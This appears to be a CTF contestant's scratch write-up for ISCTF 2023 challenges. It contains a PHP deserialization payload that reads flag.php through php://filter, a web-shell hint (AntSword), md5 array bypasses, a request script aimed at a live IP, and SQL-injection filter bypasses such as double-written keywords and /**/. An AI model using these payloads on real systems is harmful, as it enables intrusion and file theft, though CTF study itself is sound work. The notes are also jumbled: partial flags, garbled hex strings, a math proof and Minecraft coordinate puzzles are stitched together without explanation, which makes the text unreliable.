Holy Grail
```php
<?php
// Property-only class declarations used to build the serialized object graph
class artifact{
    public $excalibuer;
    public $arrow;
}
class prepare{
    public $release;
}
class saber{
    public $weapon;
}
class summon{
    public $Saber;
    public $Rider;
}
$a = new summon();
$a->Saber = new artifact();
$a->Saber->excalibuer = new prepare();
// $sb is never defined on this page, so this property serializes as null
$a->Saber->arrow = $sb;
$a->Saber->excalibuer->release = new saber();
// php://filter wrapper that reads flag.php base64-encoded
$a->Saber->excalibuer->release->weapon = "php://filter/read=convert.base64-encode/resource=flag.php";
echo urlencode(serialize($a));
```
- `where is`
Pass the parameter via POST and connect with AntSword
flag1:ISCTF{19bc
flag2:86f6-33ee-
start.sh

```sh
#!/bin/sh
sed -i "s//${FLAG:0:10}/" /var/www/localhost/htdocs/flag.php
echo ${FLAG:10:10} > /flag2
export FLAG3=${FLAG:20}
FLAG3=${FLAG:20}
export FLAG="flag"
FLAG="flag"
httpd -D FOREGROUND
```
- Bypass
Bypass md5 with arrays
hongmeng[]=1&shennong[]=2
Array bypass
zhurong[]=1
[Borrowed script](https://blog.csdn.net/qq_46918279/article/details/120667769)
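```py
import requests

# The three array parameters from the notes above go in the query string
url = "http://43.249.195.138:20583/?hongmeng[]=1&shennong[]=2&zhurong[]=1"
data = {
    # Very long 'very' prefix followed by the '2023ISCTF' suffix
    'pan_gu': 'very' * 250000 + '2023ISCTF'
}
r = requests.post(url, data=data)
print(r.text)
```

easy_website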
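Blind injection
`and`, `or` and `select` are filtered; bypass by double-writing
Bypass with tabs and parentheses; select count: there is one table, users, with 2 columns
Column 1: user
Column 2: password
password is 32 characters, an md5 hash
The usernames are admin, d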
sql
Single-quote injection; `or` is filtered and can be bypassed by double-writing; filtered spaces are bypassed with `/**/`
`ununionion/**/selselectect`
6530b62ef39cf1e8f7570adf75f69f4be9d
0123456789abcdef
0123456789abcdef
6250b64ef59cf3e8f7270adf72f69f1be9d
0123456789abcdef
0123456789abcdef
white
zo23n
black
f5s7e
Let $b=a+c$, $c>0$
Then
Let $t=c/a$
Let $f(t)=\ln(1+t)-\frac{2t}{2+t}$
So $f(t)$ is an increasing function
and since $f(0)=0$, $f(t)>0$ for all $t>0$
So $\ln b-\ln a>\frac{2(b-a)}{a+b}$
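
The two steps the proof above leaves implicit, written out as an added derivation (not part of the original write-up) with the same $a$, $b$, $c$, $t$ and $f$.

Monotonicity, for $t>0$:

$f'(t)=\frac{1}{1+t}-\frac{4}{(2+t)^2}=\frac{(2+t)^2-4(1+t)}{(1+t)(2+t)^2}=\frac{t^2}{(1+t)(2+t)^2}>0$

Substituting $t=c/a$ with $c=b-a$:

$\ln(1+t)=\ln\frac{a+c}{a}=\ln b-\ln a$

$\frac{2t}{2+t}=\frac{2c/a}{2+c/a}=\frac{2c}{2a+c}=\frac{2(b-a)}{a+b}$

so $f(t)>0$ is exactly $\ln b-\ln a>\frac{2(b-a)}{a+b}$.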
Cartesian coordinates of the blocks in MC that match each house's colour
(120,11) (68,4) (88,13) (80,8)
109 64 75 72
M @ K H
House coordinates
(48,-34) (49,-34) (68,-34) (88,-34)
82 83 102 122
R S f z
Coordinates of each block, corrected with the house as the origin
(72,45) (27,38) (20,47) (8,42)
117 65 87 50
u A W 2